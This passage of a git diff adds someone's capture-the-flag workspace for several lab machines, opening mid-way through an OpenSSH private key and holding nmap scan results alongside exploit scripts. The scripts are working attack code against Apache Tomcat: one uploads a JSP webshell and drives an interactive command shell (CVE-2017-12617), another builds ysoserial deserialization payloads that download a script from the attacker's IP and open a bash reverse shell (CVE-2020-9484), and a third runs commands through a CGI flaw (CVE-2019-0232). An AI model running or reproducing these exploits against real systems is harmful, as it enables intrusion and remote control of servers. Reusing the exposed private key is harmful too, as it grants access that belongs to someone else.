+4fu7GSqPx30NEVfArs2LEqW5Bs/bc/rbZ0UI7/ccfVvHV3qtuNv3ypX4BuQXCkMuDJoBfg +e9VbKXg7fLF28FxaYlXn25WmXpBHPPdwAAAMEAxtKShv88h0vmaeY0xpgqMN9rjPXvDs5S +2BRGRg22JACuTYdMFONgWo4on+ptEFPtLA3Ik0DnPqf9KGinc+j6jSYvBdHhvjZleOMMIH +8kUREDVyzgbpzIlJ5yyawaSjayM+BpYCAuIdI9FHyWAlersYc6ZofLGjbBc3Ay1IoPuOqX +b1wrZt/BTpIg+d+Fc5/W/k7/9abnt3OBQBf08EwDHcJhSo+4J4TFGIJdMFydxFFr7AyVY7 +CPFMeoYeUdghftAAAAE3A0aW50LXA0cnJvdEBwYXJyb3QBAgMEBQYH +-----END OPENSSH PRIVATE KEY----- diff --git a/CTF/TeamCW/nmap_scan01.txt b/CTF/TeamCW/nmap_scan01.txt new file mode 100644 index 0000000..84ca63e --- /dev/null +++ b/CTF/TeamCW/nmap_scan01.txt @@ -0,0 +1,28 @@ +# Nmap 7.99 scan initiated Wed Apr 29 15:29:45 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan01.txt 10.81.161.28 +Nmap scan report for 10.81.161.28 +Host is up (0.059s latency). +Not shown: 997 filtered tcp ports (no-response) +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.5 +22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 3072 7d:1b:f6:fa:70:b0:9a:be:52:a1:cb:85:1f:89:5f:4e (RSA) +| 256 b6:bc:3b:d8:b7:5f:b5:8e:58:89:78:11:08:a9:26:3d (ECDSA) +|_ 256 0a:ce:96:65:93:9a:4f:d7:8e:2e:f4:9d:7a:c9:e7:6f (ED25519) +80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) +|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te... +|_http-server-header: Apache/2.4.41 (Ubuntu) +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Aggressive OS guesses: Linux 4.15 - 5.19 (91%), Linux 5.14 - 6.8 (91%), Linux 4.15 (90%), Linux 5.4 - 5.15 (90%), Crestron XPanel control system (86%), Linux 3.8 - 3.16 (86%), Android 10 - 12 (Linux 4.14 - 4.19) (85%), HP P2000 G3 NAS device (85%) +No exact OS matches for host (test conditions non-ideal). +Network Distance: 3 hops +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 21/tcp) +HOP RTT ADDRESS +1 57.23 ms 192.168.128.1 +2 ... +3 56.79 ms 10.81.161.28 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Wed Apr 29 15:30:13 2026 -- 1 IP address (1 host up) scanned in 28.24 seconds diff --git a/CTF/TeamCW/nmap_scan_big.txt b/CTF/TeamCW/nmap_scan_big.txt new file mode 100644 index 0000000..ca10f2c --- /dev/null +++ b/CTF/TeamCW/nmap_scan_big.txt @@ -0,0 +1,31 @@ +# Nmap 7.99 scan initiated Wed Apr 29 15:51:44 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_big.txt 10.81.161.28 +Nmap scan report for 10.81.161.28 +Host is up (0.052s latency). +Not shown: 65532 filtered tcp ports (no-response) +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.5 +22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 3072 7d:1b:f6:fa:70:b0:9a:be:52:a1:cb:85:1f:89:5f:4e (RSA) +| 256 b6:bc:3b:d8:b7:5f:b5:8e:58:89:78:11:08:a9:26:3d (ECDSA) +|_ 256 0a:ce:96:65:93:9a:4f:d7:8e:2e:f4:9d:7a:c9:e7:6f (ED25519) +80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) +|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te... +|_http-server-header: Apache/2.4.41 (Ubuntu) +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: general purpose|specialized +Running (JUST GUESSING): Linux 4.X|5.X|6.X|3.X (91%), Crestron 2-Series (85%) +OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:6 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3 +Aggressive OS guesses: Linux 4.15 - 5.19 (91%), Linux 5.14 - 6.8 (91%), Linux 4.15 (89%), Linux 5.4 - 5.15 (89%), Crestron XPanel control system (85%), Linux 3.8 - 3.16 (85%) +No exact OS matches for host (test conditions non-ideal). +Network Distance: 3 hops +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 22/tcp) +HOP RTT ADDRESS +1 52.41 ms 192.168.128.1 +2 ... +3 52.45 ms 10.81.161.28 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Wed Apr 29 15:53:34 2026 -- 1 IP address (1 host up) scanned in 110.75 seconds diff --git a/CTF/TeamCW/nmap_scan_domain.txt b/CTF/TeamCW/nmap_scan_domain.txt new file mode 100644 index 0000000..0c00fad --- /dev/null +++ b/CTF/TeamCW/nmap_scan_domain.txt @@ -0,0 +1,31 @@ +# Nmap 7.99 scan initiated Wed Apr 29 16:39:38 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_domain.txt team.thm +Nmap scan report for team.thm (10.81.161.28) +Host is up (0.051s latency). +Not shown: 65532 filtered tcp ports (no-response) +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.5 +22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 3072 7d:1b:f6:fa:70:b0:9a:be:52:a1:cb:85:1f:89:5f:4e (RSA) +| 256 b6:bc:3b:d8:b7:5f:b5:8e:58:89:78:11:08:a9:26:3d (ECDSA) +|_ 256 0a:ce:96:65:93:9a:4f:d7:8e:2e:f4:9d:7a:c9:e7:6f (ED25519) +80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) +|_http-server-header: Apache/2.4.41 (Ubuntu) +|_http-title: Team +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: general purpose|specialized +Running (JUST GUESSING): Linux 4.X|5.X|6.X|3.X (91%), Crestron 2-Series (85%) +OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:6 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3 +Aggressive OS guesses: Linux 4.15 - 5.19 (91%), Linux 5.14 - 6.8 (91%), Linux 4.15 (89%), Linux 5.4 - 5.15 (89%), Crestron XPanel control system (85%), Linux 3.8 - 3.16 (85%) +No exact OS matches for host (test conditions non-ideal). +Network Distance: 3 hops +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 51.10 ms 192.168.128.1 +2 ... +3 51.11 ms team.thm (10.81.161.28) + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Wed Apr 29 16:41:29 2026 -- 1 IP address (1 host up) scanned in 111.12 seconds diff --git a/CTF/TeamCW/script.old b/CTF/TeamCW/script.old new file mode 100644 index 0000000..91fe740 --- /dev/null +++ b/CTF/TeamCW/script.old @@ -0,0 +1,18 @@ +#!/bin/bash +read -p "Enter Username: " ftpuser +read -sp "Enter Username Password: " T3@m$h@r3 +echo +ftp_server="localhost" +ftp_username="$Username" +ftp_password="$Password" +mkdir /home/username/linux/source_folder +source_folder="/home/username/source_folder/" +cp -avr config* $source_folder +dest_folder="/home/username/linux/dest_folder/" +ftp -in $ftp_server <') + txt = re.sub(remove, '\n', tags) + return txt.replace("\n\n\n","\n") + + +def getContent(url,f): + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + requests.packages.urllib3.disable_warnings() + re=requests.get(str(url)+"/"+str(f), headers=headers,verify=False) + return re.content + +def createPayload(url,f): + evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>' + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + requests.packages.urllib3.disable_warnings() + req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers,verify=False) + if req.status_code==201: + print "File Created .." + + +def RCE(url,f): + EVIL="""
""".format(f)+""" + + +
+ <%@ page import="java.io.*" %> + <% + String cmd = request.getParameter("cmd"); + String output = ""; + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec(cmd,null,null); + BufferedReader sI = new BufferedReader(new +InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { output += s+"
"; } + } catch(IOException e) { e.printStackTrace(); } + } +%> +
<%=output %>
""" + + + + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + requests.packages.urllib3.disable_warnings() + req=requests.put(str(url)+f+"/",data=EVIL, headers=headers,verify=False) + + + +def shell(url,f): + + while True: + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + cmd=raw_input("$ ") + payload={'cmd':cmd} + if cmd=="q" or cmd=="Q": + break + requests.packages.urllib3.disable_warnings() + re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers,verify=False) + re=str(re.content) + t=removetags(re) + print t + + + + + +#print bcolors.HEADER+ banner+bcolors.ENDC + +parse=OptionParser( + + +bcolors.HEADER+""" + + + _______ ________ ___ ___ __ ______ __ ___ __ __ ______ + / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | + | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / + | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / + | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / + \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ + + + + +./cve-2017-12617.py [options] + +options: + +-u ,--url [::] check target url if it's vulnerable +-p,--pwn [::] generate webshell and upload it +-l,--list [::] hosts list + +[+]usage: + +./cve-2017-12617.py -u http://127.0.0.1 +./cve-2017-12617.py --url http://127.0.0.1 +./cve-2017-12617.py -u http://127.0.0.1 -p pwn +./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn +./cve-2017-12617.py -l hotsts.txt +./cve-2017-12617.py --list hosts.txt + + +[@intx0x80] + +"""+bcolors.ENDC + + ) + + +parse.add_option("-u","--url",dest="U",type="string",help="Website Url") +parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it") +parse.add_option("-l","--list",dest="L",type="string",help="hosts File") + +(opt,args)=parse.parse_args() + +if opt.U==None and opt.P==None and opt.L==None: + print(parse.usage) + exit(0) + + + +else: + if opt.U!=None and opt.P==None and opt.L==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + url=str(opt.U) + checker="Poc.jsp" + print bcolors.BOLD +"Poc Filename {}".format(checker) + createPayload(str(url)+"/",checker) + con=getContent(str(url)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC + print bcolors.WARNING+url+"/"+checker+bcolors.ENDC + + else: + print 'Not Vulnerable to CVE-2017-12617 ' + elif opt.P!=None and opt.U!=None and opt.L==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + pwn=str(opt.P) + url=str(opt.U) + print "Uploading Webshell ....." + pwn=pwn+".jsp" + RCE(str(url)+"/",pwn) + shell(str(url),pwn) + elif opt.L!=None and opt.P==None and opt.U==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + w=str(opt.L) + f=open(w,"r") + print "Scaning hosts in {}".format(w) + checker="Poc.jsp" + for i in f.readlines(): + i=i.strip("\n") + createPayload(str(i)+"/",checker) + con=getContent(str(i)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m" + + + + + + + + + + + + diff --git a/CTF/Thompson/exploit.sh b/CTF/Thompson/exploit.sh new file mode 100755 index 0000000..dc20af8 --- /dev/null +++ b/CTF/Thompson/exploit.sh @@ -0,0 +1,93 @@ +#!/bin/bash + +if [ $# -ne 4 ]; then + echo " " + echo " CVE-2020-9484 Exploit" + echo " Apache Tomcat Deserialization" + echo " " + echo " Usage:" + echo " $0 [your IP] [your port] [target IP] [target port]" + echo " Example:" + echo " $0 192.168.100.4 1337 192.168.10.119 8080" + exit 1 +fi + +# Gera payload 1 (comando que irá baixar o payload no server) +echo " [*] Gerando payload 1..." +java -jar ysoserial-all.jar CommonsCollections2 'curl http://'$1'/payload.sh > /tmp/payload.sh' > downloadPayload.session + +# Gera payload 2 (payload que fará a conexão reversa) +echo " [*] Gerando payload 2..." +echo "#\!/bin/bash" > payload.sh;echo 'bash -c "bash -I >& /dev/tcp/'$1'/'$2' 0>&1"' >> payload.sh + +# Gera payload 3 (dá permissões ao payload) +echo " [*] Gerando payload 3..." +java -jar ysoserial-all.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session + +# Gera payload 4 (executa o payload) +echo " [*] Gerando payload 4..." +java -jar ysoserial-all.jar CommonsCollections2 "bash /tmp/payload.sh" > executePayload.session + +# Gera wordlist +echo " [*] Gerando wordlist..." +echo "../../../../../../tmp/" > wl.txt +echo "../../../../../tmp/" >> wl.txt +echo "../../../../tmp/" >> wl.txt +echo "../../../tmp/" >> wl.txt +echo "../../tmp/" >> wl.txt +echo "../../../../../../home/" >> wl.txt +echo "../../../../../home/" >> wl.txt +echo "../../../../home/" >> wl.txt +echo "../../../home/" >> wl.txt +echo "../../home/" >> wl.txt +echo "../../../../../../opt/" >> wl.txt +echo "../../../../../opt/" >> wl.txt +echo "../../../../opt/" >> wl.txt +echo "../../../opt/" >> wl.txt +echo "../../opt/" >> wl.txt +echo "../../../../../../opt/samples/" >> wl.txt +echo "../../../../../opt/samples/" >> wl.txt +echo "../../../../opt/samples/" >> wl.txt +echo "../../../opt/samples/" >> wl.txt +echo "../../opt/samples/" >> wl.txt +echo "../../../../../../opt/samples/uploads/" >> wl.txt +echo "../../../../../opt/samples/uploads/" >> wl.txt +echo "../../../../opt/samples/uploads/" >> wl.txt +echo "../../../opt/samples/uploads/" >> wl.txt +echo "../../opt/samples/uploads/" >> wl.txt +echo "../../../../../../usr/local/" >> wl.txt +echo "../../../../../usr/local/" >> wl.txt +echo "../../../../usr/local/" >> wl.txt +echo "../../../usr/local/" >> wl.txt +echo "../../usr/local/" >> wl.txt +echo "../../../../../../usr/local/tomcat/" >> wl.txt +echo "../../../../../usr/local/tomcat/" >> wl.txt +echo "../../../../usr/local/tomcat/" >> wl.txt +echo "../../../usr/local/tomcat/" >> wl.txt +echo "../../usr/local/tomcat/" >> wl.txt + +echo " [!] Lembre-se de iniciar o web server neste diretório" +echo " [!] Lembre-se de abrir a porta "$2"/TCP" + +# Explora +echo " [*] Explorando..." +for i in $(cat wl.txt);do + echo ' [+] Cookie:JSESSIONID='$i'downloadPayload' + curl -s 'http://'$3:$4'/index.jsp' -H 'Cookie:JSESSIONID='$i'downloadPayload' -F 'image=@downloadPayload.session' -a "Chrome" &>/dev/null; + sleep 1; + curl -s 'http://'$3:$4'/index.jsp' -H 'Cookie:JSESSIONID='$i'downloadPayload' -A "Chrome" &>/dev/null; + sleep 1; + echo ' [+] Cookie:JSESSIONID='$i'chmodPayload' + curl -s http://$3:$4/index.jsp -H 'Cookie:JSESSIONID='$i'chmodPayload' -F 'image=@chmodPayload.session' -a "Chrome" &>/dev/null; + sleep 1; + curl -s http://$3:$4/index.jsp -H 'Cookie:JSESSIONID='$i'chmodPayload' -A "Chrome" &>/dev/null; + sleep 1; + echo ' [+] Cookie:JSESSIONID='$i'executePayload' + curl -s http://$3:$4/index.jsp -H 'Cookie:JSESSIONID='$i'executePayload' -F 'image=@executePayload.session' -a "Chrome" &>/dev/null; + sleep 1; + curl -s http://$3:$4/index.jsp -H 'Cookie:JSESSIONID='$i'executePayload' -A "Chrome" &>/dev/null; + sleep 1; +done + +# Remove arquivos gerados anteriormente +rm wl.txt payload.sh downloadPayload.session chmodPayload.session executePayload.session &>/dev/null diff --git a/CTF/Thompson/exploit2.py b/CTF/Thompson/exploit2.py new file mode 100644 index 0000000..ed50db0 --- /dev/null +++ b/CTF/Thompson/exploit2.py @@ -0,0 +1,36 @@ +import requests +import sys + +# http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user + +url = sys.argv[1] + +url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C" + +cmd = sys.argv[2] + +vuln_url = url + url_dir +cmd + + +print ''' + _______ ________ ___ ___ __ ___ ___ ___ ____ ___ + / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \__ \|___ \__ \ + | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | | ) | __) | ) | + | | \ \/ / | __|______/ /| | | || |\__, |______| | | |/ / |__ < / / + | |____ \ / | |____ / /_| |_| || | / / | |_| / /_ ___) / /_ + \_____| \/ |______| |____|\___/ |_| /_/ \___/____|____/____| + + Apache Tomcat Remote Code Execution on Windows - CGI-BIN + By Jas502n + + +''' + +print "Usage: python CVE-2019-0232.py url cmd" + +print "The Vuln url:\n\n" ,vuln_url + +r = requests.get(vuln_url) + + +print "\nThe Vuln Response Content: \n\n" , r.content diff --git a/CTF/Thompson/gobuster_scan_01.txt b/CTF/Thompson/gobuster_scan_01.txt new file mode 100644 index 0000000..e69de29 diff --git a/CTF/Thompson/ip.txt b/CTF/Thompson/ip.txt new file mode 100644 index 0000000..1246c25 --- /dev/null +++ b/CTF/Thompson/ip.txt @@ -0,0 +1 @@ +10.82.164.61 diff --git a/CTF/Thompson/nmap_scan_01.txt b/CTF/Thompson/nmap_scan_01.txt new file mode 100644 index 0000000..bcacf8f --- /dev/null +++ b/CTF/Thompson/nmap_scan_01.txt @@ -0,0 +1,41 @@ +# Nmap 7.99 scan initiated Fri May 8 10:54:29 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt 10.82.164.61 +Nmap scan report for 10.82.164.61 +Host is up (0.059s latency). +Not shown: 65532 closed tcp ports (reset) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA) +| 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA) +|_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519) +8009/tcp open ajp13 Apache Jserv (Protocol v1.3) +|_ajp-methods: Failed to get a valid response for the OPTION request +8080/tcp open http Apache Tomcat 8.5.5 +|_http-favicon: Apache Tomcat +|_http-title: Apache Tomcat/8.5.5 +No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). +TCP/IP fingerprint: +OS:SCAN(V=7.99%E=4%D=5/8%OT=22%CT=1%CU=35970%PV=Y%DS=3%DC=T%G=Y%TM=69FDA552 +OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS= +OS:8)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)SEQ(SP=104%GCD=1%ISR=10D% +OS:TI=Z%CI=I%II=I%TS=8)SEQ(SP=107%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)SEQ(SP= +OS:FE%GCD=1%ISR=FF%TI=Z%CI=I%TS=A)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8 +OS:NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%W +OS:3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC= +OS:Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T= +OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0 +OS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z +OS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G +OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) + +Network Distance: 3 hops +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 3306/tcp) +HOP RTT ADDRESS +1 61.33 ms 192.168.128.1 +2 ... +3 61.36 ms 10.82.164.61 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri May 8 10:56:50 2026 -- 1 IP address (1 host up) scanned in 141.50 seconds diff --git a/CTF/Thompson/shell.war b/CTF/Thompson/shell.war new file mode 100644 index 0000000..702e8bf Binary files /dev/null and b/CTF/Thompson/shell.war differ diff --git a/CTF/VulNetInternal/.nmap_scan_01.txt.swp b/CTF/VulNetInternal/.nmap_scan_01.txt.swp new file mode 100644 index 0000000..3c89223 Binary files /dev/null and b/CTF/VulNetInternal/.nmap_scan_01.txt.swp differ diff --git a/CTF/VulNetInternal/business-req.txt b/CTF/VulNetInternal/business-req.txt new file mode 100644 index 0000000..68e34d7 --- /dev/null +++ b/CTF/VulNetInternal/business-req.txt @@ -0,0 +1,2 @@ +We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed. +If you have any questions, please text or phone us. diff --git a/CTF/VulNetInternal/data.txt b/CTF/VulNetInternal/data.txt new file mode 100644 index 0000000..803c743 --- /dev/null +++ b/CTF/VulNetInternal/data.txt @@ -0,0 +1 @@ +Purge regularly data that is not needed anymore diff --git a/CTF/VulNetInternal/ip.txt b/CTF/VulNetInternal/ip.txt new file mode 100644 index 0000000..065bc0d --- /dev/null +++ b/CTF/VulNetInternal/ip.txt @@ -0,0 +1 @@ +10.81.148.220 diff --git a/CTF/VulNetInternal/nmap_scan_01.txt b/CTF/VulNetInternal/nmap_scan_01.txt new file mode 100644 index 0000000..9d8d5aa --- /dev/null +++ b/CTF/VulNetInternal/nmap_scan_01.txt @@ -0,0 +1,108 @@ +# Nmap 7.99 scan initiated Fri May 8 14:45:27 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt -vv 10.81.148.220 +Increasing send delay for 10.81.148.220 from 0 to 5 due to 4072 out of 10179 dropped probes since last increase. +Increasing send delay for 10.81.148.220 from 5 to 10 due to 11 out of 15 dropped probes since last increase. +Nmap scan report for 10.81.148.220 +Host is up, received echo-reply ttl 62 (0.14s latency). +Scanned at 2026-05-08 14:45:28 CEST for 809s +Not shown: 65523 closed tcp ports (reset) +PORT STATE SERVICE REASON VERSION +22/tcp open ssh syn-ack ttl 62 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 3072 98:e3:07:4c:6b:a4:76:d3:79:3b:a9:d1:99:b0:46:eb (RSA) +| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqmyZu4KaquMZ07hdtn2wyFLtqufrbvj6tu4yxV+V1lCBPLusk08xoEB/ZApuqEvXFiQM8jSDz8jVyZh+b2TE+AWCllzQ4tZnlcy0GuSvnrjZGJrSMESwuAlMTQuLXhoPeRnDHgPI6JWnRR6J0Gn6iHv3i1t5tEWploahO5YK5GBXBQHwljMNIaE0Mlopu3vfj6Y3S3BK/cvHyGYbhtSzQdFLYp+z/MkqPjqlQ45yEiLTk2U6IT42YrbJddT/wcnjnColbt0dD8UvcjEdeCg9SIZW9aZpmTns6jztPiQRGZonRckcRNvCko5vDJSXzBELoy6PQeDiZXYfCw3KlQDilmzXlcSvW4MhZ84tznqdzyGLHniLmm/DsXv+g91/gGNYh8PPqACtHXwTGz5Gm0CKI4F+z16x9tgGgvLw//QkAChlK3fmUWoyThL6ZW2X+MKKYpw2ymBHRdO7zGqAASSV4gml63NNt0jXWBjpd/w/77AJgJn0QpkBZ0Vb8Yyc5rdM= +| 256 31:34:e6:37:c2:d5:09:63:3d:0a:1c:73:f9:1b:8d:49 (ECDSA) +| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPa5KoSCT2U8tKjs86x8w4VME70mSnSK7ZhfaXE5mo4y8+ERNlcMAJG0nSlvwOYDWbII3sA76PsnUReCuyDj6Ho= +| 256 ce:eb:45:8f:c8:cb:b8:c6:33:cf:8c:40:97:38:4d:6b (ED25519) +|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAlHg69fqfg/GBqzjBKrRDT3PXbto4Qhvx7/PfsiflSB +111/tcp open rpcbind syn-ack ttl 62 2-4 (RPC #100000) +| rpcinfo: +| program version port/proto service +| 100000 2,3,4 111/tcp rpcbind +| 100000 2,3,4 111/udp rpcbind +| 100000 3,4 111/tcp6 rpcbind +| 100000 3,4 111/udp6 rpcbind +| 100003 3 2049/udp nfs +| 100003 3 2049/udp6 nfs +| 100003 3,4 2049/tcp nfs +| 100003 3,4 2049/tcp6 nfs +| 100005 1,2,3 42205/udp mountd +| 100005 1,2,3 51151/tcp mountd +| 100005 1,2,3 59595/udp6 mountd +| 100005 1,2,3 60983/tcp6 mountd +| 100021 1,3,4 38519/tcp nlockmgr +| 100021 1,3,4 41999/tcp6 nlockmgr +| 100021 1,3,4 46131/udp6 nlockmgr +| 100021 1,3,4 46853/udp nlockmgr +| 100227 3 2049/tcp nfs_acl +| 100227 3 2049/tcp6 nfs_acl +| 100227 3 2049/udp nfs_acl +|_ 100227 3 2049/udp6 nfs_acl +139/tcp open netbios-ssn syn-ack ttl 62 Samba smbd 4 +445/tcp open netbios-ssn syn-ack ttl 62 Samba smbd 4 +873/tcp open rsync syn-ack ttl 62 (protocol version 31) +2049/tcp open nfs syn-ack ttl 62 3-4 (RPC #100003) +6379/tcp open redis syn-ack ttl 62 Redis key-value store +9090/tcp filtered zeus-admin no-response +37291/tcp open mountd syn-ack ttl 62 1-3 (RPC #100005) +38519/tcp open nlockmgr syn-ack ttl 62 1-4 (RPC #100021) +40795/tcp open mountd syn-ack ttl 62 1-3 (RPC #100005) +51151/tcp open mountd syn-ack ttl 62 1-3 (RPC #100005) +No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). +TCP/IP fingerprint: +OS:SCAN(V=7.99%E=4%D=5/8%OT=22%CT=1%CU=39961%PV=Y%DS=3%DC=T%G=Y%TM=69FDDE12 +OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS= +OS:A)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=1%ISR=10A% +OS:TI=Z%CI=Z%II=I%TS=A)SEQ(SP=FB%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F +OS:F%GCD=1%ISR=103%TI=Z%CI=Z%TS=A)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8 +OS:NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=F4B3%W2=F4B3%W +OS:3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M4E8NNSNW7%CC= +OS:Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T= +OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0 +OS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z +OS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G +OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) + +Uptime guess: 15.312 days (since Thu Apr 23 07:29:34 2026) +Network Distance: 3 hops +TCP Sequence Prediction: Difficulty=255 (Good luck!) +IP ID Sequence Generation: All zeros +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Host script results: +| smb2-time: +| date: 2026-05-08T12:58:55 +|_ start_date: N/A +| nbstat: NetBIOS name: , NetBIOS user: , NetBIOS MAC: (unknown) +| Names: +| 